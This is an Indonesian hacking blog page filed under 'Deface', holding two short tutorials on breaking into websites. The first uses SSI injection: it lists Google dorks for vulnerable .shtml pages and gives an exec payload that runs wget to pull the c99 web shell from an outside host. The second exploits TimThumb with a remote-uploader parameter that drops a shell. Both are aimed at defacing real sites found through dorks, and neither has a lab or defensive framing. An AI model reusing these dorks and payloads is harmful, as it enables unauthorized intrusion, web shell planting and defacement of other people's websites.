• Download Anz Komik Apk

    Anz Komik adalah aplikasi baca komik gratis dengan lebih dari 1000 judul komik mulai dari Manga, Manhwa dan Manhua yang sudah dirilis dalam versi bahasa Indonesia.

  • Tujuan Pembentukan LBB

    Liga Bangsa-Bangsa beranggotakan 28 negara sekutu dan 14 negara netral. Tujuan pembentukan LBB pada waktu itu adalah untuk:

  • Daftar lagu soundtrack piala dunia (1990-2018)dan piala eropa (2000-2020)

    1.Gianna Nannini dan Edoardo Bennato-Un'estate (World Cup 1990) 1.1 We Are the Champions - Queen (World Cup 1994) 2.Ricky Martin - La Copa De La Vida (World Cup 1998)...

Tampilkan postingan dengan label Deface. Tampilkan semua postingan
Tampilkan postingan dengan label Deface. Tampilkan semua postingan

Selasa, 25 Desember 2018

Tutorial Deface Dengan Cara Server Side Include Injection (SSI Injection)

By  at Desember 25, 2018    No comments
Dan hari ini gw ingin share POC Deface Dengan Cara Server Side Include Injection (SSI Injection)

Lalu apa itu SSI Injection
Gw jelasin sedikit apa itu SSI Injection

Server Side Includes (SSI) adalah bahasa server untuk halaman web, yang dirancang untuk membuat halaman HTML statis sedikit lebih dinamis.
SSI bermaksud membuat halaman HTML mirip dengan aplikasi dinamis, seperti yang ditulis dalam ASP, PHP dan bahasa yang serupa dan memungkinkan penyertaan server informasi dinamis di halaman HTML. Halaman HTML dengan tag SSI biasanya memiliki ekstensi shtml atau shtm.

Penggunaan SSI yang paling umum adalah termasuk konten file ke dalam halaman web dari server web.


DORK

inurl:bin/Cklb/ - Best Dork
inurl:login.shtml
inurl:login.shtm
inurl:login.stm
inurl:search.shtml
inurl:search.shtm
inurl:search.stm
inurl:forgot.shtml
inurl:forgot.shtm
inurl:forgot.stm
inurl:register.shtml
inurl:register.shtm
inurl:register.stm
inurl:login.shtml?page=


Gw menemukan halaman ini dan memasukkan nama pengguna gw sebagai Sylar:




Kita dapat melihat pada gambar di atas bahwa nama pengguna yang kita masukkan telah ditampilkan di layar setelah kami mengirim data dan halaman dengan ekstensi shtml, jadi menurut lo apa yang akan terjadi jika gw memasukkan nama pengguna gw sebagai:

<!--#echo var="HTTP_USER_AGENT" -->

Lalu akan muncul ini




Sekarang gw akan mencoba memasukkan kode berikut sebagai nama pengguna:

<!--#exec cmd="wget http://www.sh3ll.org/c99.txt? -O shell.php" -->

Kalau berhasil akan muncul seprti ini


The command executed successfully
Sekarang kita lihat shell kita
akses shellnya? site.com/shell.php


Ok cukup mudah bukan? XD

Ok guys cukup sekian, soalnya admin mau lebaran dulu sama teman teman, keluarga dll nya :)

Tutorial Deface Dengan Cara Timthumb RCE

By  at Desember 25, 2018    No comments


Kali ini admin ganteng mau share cara deface nih, yap Deface Dengan Cara Timthumb

langsung aja bahan bahannya

DORK : inurl:timthumb.php?src=   [ SELEBIHNYA KEMBANGIN SENDIRI]

EXPLOIT :
?src=http://flickr.com.ehpet.net/uploader.php


1. search di google pke dork di atas, kalau vuln tandanya seperti ini

2. Lalu masukkan exploitnya, maka akan seperti ini


3. Lalu dimana letak shellnya?, buka yg gw tandain kotak wrna merah


4. Klo udh dibuka, maka akan muncul success seperti ini


5. Akses shellnya? oke lihat yg gw tandain kotak warna merah

yap ada tulisan cache/upz.php
Sekarang kita coba buka, dan hasilnyaa...


Damn, berhasil !!!

Oke tinggal kalian deface deh webnya

Oke sekian dulu tutorialnya
Terima kasih sudah berkunjung.....